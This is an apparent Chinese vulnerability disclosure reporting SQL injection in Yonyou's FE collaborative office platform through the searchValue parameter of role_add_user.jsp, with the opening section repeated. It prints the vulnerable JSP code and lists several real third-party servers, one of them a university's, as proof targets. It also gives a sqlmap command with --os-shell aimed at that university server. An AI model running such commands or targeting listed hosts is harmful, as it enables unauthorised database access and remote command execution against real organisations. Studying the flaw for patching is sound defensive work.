### 简要描述: 用友某系统存在通用SQL注入 ### 详细说明: 用友FE协作办公平台最新版 漏洞url: ``` /security/role_add_user.jsp?dept=1&roleid=2&searchValue=3 ``` 部分代码 ``` <% // String searchValue=HtmlFormat.format(request.getParameter("searchValue"));//这个参数 String filter=""; Dao dao=(Dao)ResourceManage.getContext("basicDao"); FieldSet groupFs=dao.getFieldSetByFilter("SYS_GROUP","SG04='/'"); String groupName=groupFs.getString("SG03"); DataTable dataTable=null; if(!"".equals(roleId)){ if(!groupName.equals(dept)) filter=" and su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ; else filter=" su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ; } if(!"".equals(searchValue)){ filter=filter+" and (su02 like '%"+searchValue+"%' or SU01 like '%"+searchValue+"%')"; } if(!groupName.equals(dept)){ dataTable=dao.getDataTable("GROUP_USER_V"," sg03='"+dept+"'"+filter,"gu03"); } else{ dataTable=dao.getDataTable("SYS_USERS",filter,"SU03"); } %> ```...
### 简要描述: 用友某系统存在通用SQL注入 ### 详细说明: 用友FE协作办公平台最新版 漏洞url: ``` /security/role_add_user.jsp?dept=1&roleid=2&searchValue=3 ``` 部分代码 ``` <% // String searchValue=HtmlFormat.format(request.getParameter("searchValue"));//这个参数 String filter=""; Dao dao=(Dao)ResourceManage.getContext("basicDao"); FieldSet groupFs=dao.getFieldSetByFilter("SYS_GROUP","SG04='/'"); String groupName=groupFs.getString("SG03"); DataTable dataTable=null; if(!"".equals(roleId)){ if(!groupName.equals(dept)) filter=" and su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ; else filter=" su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ; } if(!"".equals(searchValue)){ filter=filter+" and (su02 like '%"+searchValue+"%' or SU01 like '%"+searchValue+"%')"; } if(!groupName.equals(dept)){ dataTable=dao.getDataTable("GROUP_USER_V"," sg03='"+dept+"'"+filter,"gu03"); } else{ dataTable=dao.getDataTable("SYS_USERS",filter,"SU03"); } %> ``` 其中searchValue存在注入。 证明: ``` http://oa.jiada.cc:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3 ``` [<img src="https://images.seebug.org/upload/201405/241733258756c2bf77141956cff60c197e375b52.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/241733258756c2bf77141956cff60c197e375b52.jpg) ``` http://oa.shunhengli.com:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3 ``` [<img src="https://images.seebug.org/upload/201405/24173758a611e2fcec3258a16170d4881448a19c.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/24173758a611e2fcec3258a16170d4881448a19c.jpg) ``` http://oa.nbsec.org:9090//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3 ``` [<img src="https://images.seebug.org/upload/201405/241739581865494dc9783e20e373f9b12a6df0bc.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/241739581865494dc9783e20e373f9b12a6df0bc.jpg) ``` http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3 ``` [<img src="https://images.seebug.org/upload/201405/2417423850a0f5159e9947c8274999b3ec4c0e19.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2417423850a0f5159e9947c8274999b3ec4c0e19.jpg) ### 漏洞证明: ``` sqlmap -u "http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3" -p searchValue --os-shell ``` [<img src="https://images.seebug.org/upload/201405/24174518c95eb06c33dcf401c4d79d45f8088b20.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/24174518c95eb06c33dcf401c4d79d45f8088b20.jpg)
